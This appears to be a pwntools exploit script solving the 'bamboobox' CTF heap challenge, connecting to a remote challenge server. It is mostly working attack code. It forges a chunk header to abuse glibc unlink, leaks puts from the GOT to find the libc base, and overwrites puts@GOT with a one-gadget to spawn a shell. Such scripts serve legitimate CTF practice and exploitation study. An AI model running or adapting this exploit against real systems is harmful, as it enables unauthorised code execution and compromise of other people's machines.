hitcontraining_unlink

from pwn import *

# Target settings: 64-bit binary, verbose pwntools I/O logging.
context.update(arch="amd64", log_level="debug")

# Local alternative kept for reference:
# p = process("./bamboobox")
p = remote("node5.buuoj.cn", 26684)
# The challenge binary and the matching libc build; both are only read for
# symbols later on (elf.got / libc.sym), never executed by this script.
elf = ELF("./bamboobox")
libc = ELF("./libc-2.23.so")

def add(length, name):
    """Menu option 2: create an item of *length* bytes whose name is *name* (bytes)."""
    replies = (
        (b"Your choice:", b"2"),
        (b"Please enter the length of item name:", str(length).encode()),
        (b"Please enter the name of item:", name),
    )
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)


def delete(idx):
    """Menu option 4: remove the item at index *idx*."""
    replies = (
        (b"Your choice:", b"4"),
        (b"Please enter the index of item:", str(idx).encode()),
    )
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)


def show():
    """Menu option 1: list the stored items (the caller parses the output)."""
    choice = b"1"
    p.sendlineafter(b"Your choice:", choice)


def edit(idx, size, content):
    """Menu option 3: rewrite item *idx*, announcing *size* and then sending *content* (bytes)."""
    replies = (
        (b"Your choice:", b"3"),
        (b"Please enter the index of item:", str(idx).encode()),
        (b"Please enter the length of item name:", str(size).encode()),
        (b"Please enter the new name of the item:", content),
    )
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)


# Four items; chunk1 (0x80) is allocated directly before chunk2 (0xf0).
add(0x80, b"chunk0")
add(0x80, b'chunk1')
add(0xf0, b'chunk2')
add(0x80, b'chunk3')
# 0x90 bytes are sent for an item created with length 0x80: a fake chunk header
# (fd = 0x6020d8-0x18, bk = 0x6020d8-0x10, the unlink-check pattern) followed by
# padding and a prev_size/size pair (0x80, 0x100) that overlays the next chunk.
# NOTE(review): 0x6020d8 is a raw address while puts is looked up via elf.got —
# presumably the item table in .bss; confirm against ./bamboobox rather than
# relying on the literal.
edit(1, 0x90, p64(0) + p64(0x80) + p64(0x6020d8-0x18) + p64(0x6020d8-0x10) + b'a' * 0x60 + p64(0x80) + p64(0x100))
# Freeing chunk2 triggers the unlink (see the title of this write-up).
delete(2)
show()

# Presumably item 1 now points into the item table, so this write makes entry 0
# refer to puts@GOT — confirm from the show() output above.
edit(1, 0x20, p64(0x10)+ p64(elf.got["puts"]))
show()
# Entry 0 is printed as raw bytes: 6 low bytes of the puts address, zero-padded to 8.
p.recvuntil(b"0 : ")
leak = u64(p.recv(6).ljust(8, b"\x00"))
libc.address = leak - libc.sym["puts"]
# log.info("leak: " + hex(leak))
log.info("libc: " + hex(libc.address))
# Offset specific to this libc-2.23.so build; recompute if the libc file changes.
onegadget = 0x45216
# Writing entry 0 rewrites the location it refers to (presumably puts@GOT, per above).
edit(0, 0x10, p64(libc.address + onegadget))

# gdb.attach(p)
p.interactive()